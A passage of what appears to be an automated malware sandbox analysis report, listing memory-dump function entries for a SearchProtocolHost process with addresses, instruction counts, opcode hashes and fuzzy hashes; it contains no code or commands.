                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c2c6096004317b3e2cbb109bb104aaee75483697472e9d53eba9485f650d4a3f
                                                                                      • Instruction ID: dc8e05bd8b0e8418d2a833af8900dec799c1342fa5a9cdfe2c9ab081a7903b9e
                                                                                      • Opcode Fuzzy Hash: c2c6096004317b3e2cbb109bb104aaee75483697472e9d53eba9485f650d4a3f
                                                                                      • Instruction Fuzzy Hash: CC41AD35100B49DFEB22CF29C994F96B7E9FF45314F04892AEA598B351D774E801DBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037B66E0 Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                                                                                      • Instruction ID: 9e88fc7dfc9f27f9eeef870ab981487b2459a90d80a50de5473c9ce9bd5f2e58
                                                                                      • Opcode Fuzzy Hash: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                                                                                      • Instruction Fuzzy Hash: 40417C76100A4ADFC732DF54C984FAAB7B5FF48B60F044568E5498F6A0CB31E841DB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037B5004 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6904b97a78a8f861ff4442eec5fb2e07ed5aa04020598f104a3def01148d2435
                                                                                      • Instruction ID: d84b98f6278693631411d800b63ccecde0252a5f33c732cb80f6e2751b68a5fb
                                                                                      • Opcode Fuzzy Hash: 6904b97a78a8f861ff4442eec5fb2e07ed5aa04020598f104a3def01148d2435
                                                                                      • Instruction Fuzzy Hash: CA31F331608349DFD721DA39C414BA6F7F9EB863A0F08856AF9C58B381D275C881C7E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0380E79D Relevance: .1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d52535bc0783fd1e319806c4ac4cc2657c86056199db473f7ad91fd52f1b81ae
                                                                                      • Instruction ID: 65cb1d915b7d294bfc1a991b4d8ade8f58aad63d25bcc02b442c61959fbcc52c
                                                                                      • Opcode Fuzzy Hash: d52535bc0783fd1e319806c4ac4cc2657c86056199db473f7ad91fd52f1b81ae
                                                                                      • Instruction Fuzzy Hash: 1A31A275741E80ABF326DBEC8D88B26E7D9AB41B44F1D08E4A944DB6D2D728E840C251
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037906CF Relevance: .1, Instructions: 95COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 198a2da909151efd9015cce6078fa66ca25e96f75e3db986fc07637af8d2cbf9
                                                                                      • Instruction ID: e49f324e670d83f492216c9437eebef422934e82b4320f0504b14e31b7dc9e48
                                                                                      • Opcode Fuzzy Hash: 198a2da909151efd9015cce6078fa66ca25e96f75e3db986fc07637af8d2cbf9
                                                                                      • Instruction Fuzzy Hash: BB31D63A6147019BDF11EF249C84D6BB7AAAF84660F05466EFD159B310EB30DC019FA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03798470 Relevance: .1, Instructions: 94COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: af374862a1811ed2f431dbd533802703e25624d2e6fbca59b998c502fa27b122
                                                                                      • Instruction ID: ca8885e2dba6c479f53d730a80ab0954ed232c684cc0fe6fac2069f27ed50f19
                                                                                      • Opcode Fuzzy Hash: af374862a1811ed2f431dbd533802703e25624d2e6fbca59b998c502fa27b122
                                                                                      • Instruction Fuzzy Hash: C0316D72A05341DFD760CF19C800B66F7E9BF88704F5949AEE98897361D774E844CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378D64A Relevance: .1, Instructions: 93COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                                                      • Instruction ID: a9030d3ad8a3e973a8e9159c6ab2fbf1bf8f7cc4a5596b03226eae116673ff28
                                                                                      • Opcode Fuzzy Hash: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                                                      • Instruction Fuzzy Hash: CE31A076780648AFDB31FF58C980F6AB3B9EB84794F2D8469E9099B280D774DD40CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037956E0 Relevance: .1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d7ccc352dc127e87e819bbf614f589de4daa8b1be95a10d7a0d58e20bcc52348
                                                                                      • Instruction ID: 1e136d285ad6b1e67ab6796f82fceaf3a944f59640f5537352e14b18b973d519
                                                                                      • Opcode Fuzzy Hash: d7ccc352dc127e87e819bbf614f589de4daa8b1be95a10d7a0d58e20bcc52348
                                                                                      • Instruction Fuzzy Hash: EA31CF39711A05FFEB16DF24DE84A69BBA6FF84210F44519AE9018BB51C731E830CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 038617BC Relevance: .1, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                      • Instruction ID: 7911c73d49b8b002f0fc91975084bbfe7ce651212454479be7476b84b741151b
                                                                                      • Opcode Fuzzy Hash: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                      • Instruction Fuzzy Hash: DE3170B2E00119EFC714DFA9C484AADB7F1FF48315F1581A9E854DB346D734AA51CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0383E750 Relevance: .1, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0c1211bbf0b088a09765f3069d024c4400a5ffb201ee3a1d4dbe4869e64fc156
                                                                                      • Instruction ID: 3e62ddd3da5664b107d44caef40610bd6a1ab616394c8d3bca1c9498e2dff01d
                                                                                      • Opcode Fuzzy Hash: 0c1211bbf0b088a09765f3069d024c4400a5ffb201ee3a1d4dbe4869e64fc156
                                                                                      • Instruction Fuzzy Hash: 3B3138769053019FCB10EF59C44495ABBE5FF8A618F088AEEE488AB351D231ED05CFD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037B42AF Relevance: .1, Instructions: 89COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 777a24d072b638704d807c0e6ec4493ca262a603939f97b4fa2bffa240935710
                                                                                      • Instruction ID: f3060491c7f3ded10bba7ee7dfc462ba4cb8d620173cb125e0fecacb831154fb
                                                                                      • Opcode Fuzzy Hash: 777a24d072b638704d807c0e6ec4493ca262a603939f97b4fa2bffa240935710
                                                                                      • Instruction Fuzzy Hash: DC31BF32B006059FC710EFAAC984BAEF7FAFB48304F144529D546EB251E730E941CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037991E5 Relevance: .1, Instructions: 89COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
                                                                                      • Instruction ID: 1e97c883e39f58dd6b4113771aaed3a496ebf9751ebc06802654aa21dc24b949
                                                                                      • Opcode Fuzzy Hash: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
                                                                                      • Instruction Fuzzy Hash: 9C318A796083559FDB05DF18E84096ABBE9FF89710F040AAAF955DB391D730DC00CBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378E3C0 Relevance: .1, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3d23b54d1fb541a450d77247bf7552e9e975a0663af838abde852dca72ae4b70
                                                                                      • Instruction ID: 7d082e30be9dbfeab1b411d56069c3dd7b107fe8b58dd24c685908752dbdae88
                                                                                      • Opcode Fuzzy Hash: 3d23b54d1fb541a450d77247bf7552e9e975a0663af838abde852dca72ae4b70
                                                                                      • Instruction Fuzzy Hash: 0F31D635A4062CABDB31EB14CC45FEEB7B9AB45740F0501A1F64DAB190D7B49E81CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378C0F6 Relevance: .1, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0e12c2932b01773d5aad3042cb7748e5c86ba915a844ccbbbb6e49a99cdd5240
                                                                                      • Instruction ID: e003e80b5c72058c4f7a875ca886769268c7f157497d5e0568fd4e60e279f46b
                                                                                      • Opcode Fuzzy Hash: 0e12c2932b01773d5aad3042cb7748e5c86ba915a844ccbbbb6e49a99cdd5240
                                                                                      • Instruction Fuzzy Hash: A431F7B69003109FDB31EF18C845B69B7B4EF96318F48C1A9DD459F386EA34E985CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C43D0 Relevance: .1, Instructions: 87COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2e576e04abefb287bffeeb4f5e9d78ae9d15a824ce5d14675d05e1651a7bc9c3
                                                                                      • Instruction ID: 9a9a94e1c75d1bf08e53168f492bfb69a22fbf3b53d38103af95827a525b1ee3
                                                                                      • Opcode Fuzzy Hash: 2e576e04abefb287bffeeb4f5e9d78ae9d15a824ce5d14675d05e1651a7bc9c3
                                                                                      • Instruction Fuzzy Hash: 0821AE725247819BCB22DE59C890F9BB7E9FF88720F14455DF8489B240C730EA01DBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378E328 Relevance: .1, Instructions: 86COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0c10296873cf600f6b0a0c706f82a02acdaa8580c5042cc564ea67225c26c471
                                                                                      • Instruction ID: f05465cbcf5954fec3d47b343af0267863affacb6f5755fc6c56ec9f6e80fefd
                                                                                      • Opcode Fuzzy Hash: 0c10296873cf600f6b0a0c706f82a02acdaa8580c5042cc564ea67225c26c471
                                                                                      • Instruction Fuzzy Hash: 21319A35600604EFE721DF68C884F6AB7F9EF89354F1445A9E452DBA80E770EE01CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0380E289 Relevance: .1, Instructions: 86COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4bd8001dc5ec097feeb7df9cb1a635c2140dbce52fd38f6ec3ab9c16a2d2b849
                                                                                      • Instruction ID: c7bdd177eeee263e153adb0f95b78b4b95dbee0afa6add37496c5e387e6b14e1
                                                                                      • Opcode Fuzzy Hash: 4bd8001dc5ec097feeb7df9cb1a635c2140dbce52fd38f6ec3ab9c16a2d2b849
                                                                                      • Instruction Fuzzy Hash: 64314D75A00605DFCB54CF68C884AAEBBB5FFC4704B169999E849DB390E731F941CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03793536 Relevance: .1, Instructions: 84COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6db57fa83884934f557ae49b29725597b1b2c55e2c101358a1156496920afb76
                                                                                      • Instruction ID: 69cc15cf080aece4c635790fc9ad47e7867ce0427ffd9da7a4f3057b692203ba
                                                                                      • Opcode Fuzzy Hash: 6db57fa83884934f557ae49b29725597b1b2c55e2c101358a1156496920afb76
                                                                                      • Instruction Fuzzy Hash: 3921F7392057009FFB22EF58D944B2ABBA5EF84B10F09079AE8518B741C770EC44CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03810371 Relevance: .1, Instructions: 79COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 250bca29492f7f9284a1bb1d0eadeacd7c9c1604b6e862941f02df2eda603f90
                                                                                      • Instruction ID: 1a5a3a4c9cb78be4b856a246fab43f70d48f5a505e91696975a95670ab7c6cbd
                                                                                      • Opcode Fuzzy Hash: 250bca29492f7f9284a1bb1d0eadeacd7c9c1604b6e862941f02df2eda603f90
                                                                                      • Instruction Fuzzy Hash: DB219175900629EBCF14DF99C881ABEB7F8FF48704B5400A9E441FB240D778AD51CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037BF24A Relevance: .1, Instructions: 79COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 69c195a3189068303f57af3f3cdfe3eb55acd34ac4728b34706f80ab0957ac2a
                                                                                      • Instruction ID: ec2504fc6f297cdb0c5abaa170e586a08cea9f482634933395a562bca25e9d7f
                                                                                      • Opcode Fuzzy Hash: 69c195a3189068303f57af3f3cdfe3eb55acd34ac4728b34706f80ab0957ac2a
                                                                                      • Instruction Fuzzy Hash: E421B0752012049FC719DF55C840BAABBF9EF89761F15416EE0068B290E770EC40CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C9580 Relevance: .1, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c790fb2b0caa24992101f30be3806614145a5cc18fb12729bf82d02ce59b67c6
                                                                                      • Instruction ID: 8c3100a6a90605cb985122d75c983a63c226f3ef0f9b7c2a7370ea2a8c0ac8da
                                                                                      • Opcode Fuzzy Hash: c790fb2b0caa24992101f30be3806614145a5cc18fb12729bf82d02ce59b67c6
                                                                                      • Instruction Fuzzy Hash: 9D210730214B40DBCFB5EB64EC04B2277A5EF42320F140ADDEA5A8A5D2E730E841DF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0386B781 Relevance: .1, Instructions: 77COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 03d73048c1557e6572f79edf33723a9f7eca74ce9479cfa7d416fcb5a3bac927
                                                                                      • Instruction ID: 152ce3d79457c8172def1a1f805e833b951682513cca1af2cd3450a04860c402
                                                                                      • Opcode Fuzzy Hash: 03d73048c1557e6572f79edf33723a9f7eca74ce9479cfa7d416fcb5a3bac927
                                                                                      • Instruction Fuzzy Hash: D921C236A00655FFDB22DF9AC884F5ABBB8EF457A8F0980A5E804DB210D334DD00CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037B2755 Relevance: .1, Instructions: 73COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f7cb5b33be95c3a0eda7fbab9689840bd0dfce7e308de141aff884a831abc087
                                                                                      • Instruction ID: 9c73baa412384d25fd91c2a466832216865eb05577dc84ea483b34bff81a235e
                                                                                      • Opcode Fuzzy Hash: f7cb5b33be95c3a0eda7fbab9689840bd0dfce7e308de141aff884a831abc087
                                                                                      • Instruction Fuzzy Hash: BC21F535745780AFE322D76C8C4CF24B7FAAB45B30F2C07A4EA249F7E2D76888018614
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037CA22B Relevance: .1, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
